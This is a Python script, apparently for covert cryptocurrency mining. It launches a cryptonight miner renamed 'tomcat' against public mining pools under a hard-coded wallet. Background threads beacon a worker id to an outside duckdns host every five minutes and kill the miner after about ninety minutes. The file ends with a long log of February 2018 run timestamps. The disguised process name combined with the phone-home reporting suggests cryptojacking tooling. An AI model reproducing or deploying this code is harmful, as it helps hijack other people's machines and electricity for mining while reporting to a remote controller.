import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:03.222177
#2018-02-17 17:42:05.298251
#2018-02-17 19:31:04.645343
#2018-02-17 21:20:05.069733
#2018-02-17 23:03:06.296095
#2018-02-18 00:50:07.630103
#2018-02-18 02:37:07.675705
#2018-02-18 04:26:05.191958
#2018-02-18 06:17:05.160527
#2018-02-18 08:07:05.387710
#2018-02-18 09:54:04.892220
#2018-02-18 11:41:01.734070
#2018-02-18 13:26:07.109773
#2018-02-18 15:16:06.583057
#2018-02-18 17:04:07.815048
#2018-02-18 18:51:02.181996
#2018-02-18 20:38:05.821202
#2018-02-18 22:24:06.964519
#2018-02-19 00:14:03.759420
#2018-02-19 02:00:10.216999
#2018-02-19 03:47:05.574578
#2018-02-19 05:33:04.562496
#2018-02-19 07:20:07.660375
#2018-02-19 09:09:05.797279
#2018-02-19 10:58:08.487496
#2018-02-19 12:47:04.146110
#2018-02-19 14:36:07.452409
#2018-02-19 16:24:09.263426
#2018-02-19 18:10:11.338760
#2018-02-19 19:58:07.512144
#2018-02-19 21:46:09.214540
#2018-02-19 23:33:05.348978
#2018-02-20 01:18:04.703014
#2018-02-20 03:08:03.997759
#2018-02-20 04:55:06.262193
#2018-02-20 06:38:06.200807
#2018-02-20 08:23:04.205699
#2018-02-20 10:08:05.634139
#2018-02-20 11:53:01.365686
#2018-02-20 13:41:05.047731
#2018-02-20 15:24:06.883783
#2018-02-20 17:11:07.310156
#2018-02-20 19:01:06.378971
#2018-02-20 20:49:07.702309
#2018-02-20 22:35:08.135168
#2018-02-21 00:18:04.890393
#2018-02-21 02:04:03.853640
#2018-02-21 03:51:06.047578
#2018-02-21 05:38:06.349585
#2018-02-21 07:26:04.380375
#2018-02-21 09:11:04.039003
#2018-02-21 10:59:09.341769
#2018-02-21 12:45:08.114619
#2018-02-21 14:32:06.181849
#2018-02-21 16:18:08.928402
#2018-02-21 18:08:01.485094
#2018-02-21 19:55:06.279070
#2018-02-21 21:41:04.049658
#2018-02-21 23:28:06.617758
#2018-02-22 01:17:06.342345
#2018-02-22 03:08:07.061188
#2018-02-22 04:52:07.285102
#2018-02-22 06:38:02.053242
#2018-02-22 08:26:01.975313
#2018-02-22 10:13:06.028569
#2018-02-22 11:58:12.245728
#2018-02-22 13:44:04.536423
#2018-02-22 15:33:08.890902
#2018-02-22 17:19:01.643988
#2018-02-22 19:07:08.478854
#2018-02-22 20:59:07.523534
#2018-02-22 22:44:12.488842
#2018-02-23 00:29:06.083302
#2018-02-23 02:16:05.502509
#2018-02-23 04:05:09.262101
#2018-02-23 05:51:07.433489
#2018-02-23 07:42:05.723599
#2018-02-23 09:44:07.438393
#2018-02-23 11:52:01.363550
#2018-02-23 13:40:07.405791
#2018-02-23 15:28:06.284465
#2018-02-23 17:17:09.210822
#2018-02-23 19:02:10.896406
#2018-02-23 20:49:01.790924
#2018-02-23 22:39:04.696327
#2018-02-24 00:26:01.849662
#2018-02-24 02:17:01.620427
#2018-02-24 04:06:07.170475
#2018-02-24 05:53:01.931363
#2018-02-24 07:42:06.231932
#2018-02-24 09:27:07.278583
#2018-02-24 11:20:08.824074
#2018-02-24 13:09:07.482046
#2018-02-24 14:59:01.728769
#2018-02-24 16:48:07.345914
#2018-02-24 18:36:02.079030
#2018-02-24 20:23:06.943097
#2018-02-24 22:18:04.882450
#2018-02-25 01:27:01.848210
#2018-02-25 04:53:07.335376
#2018-02-25 08:20:01.442925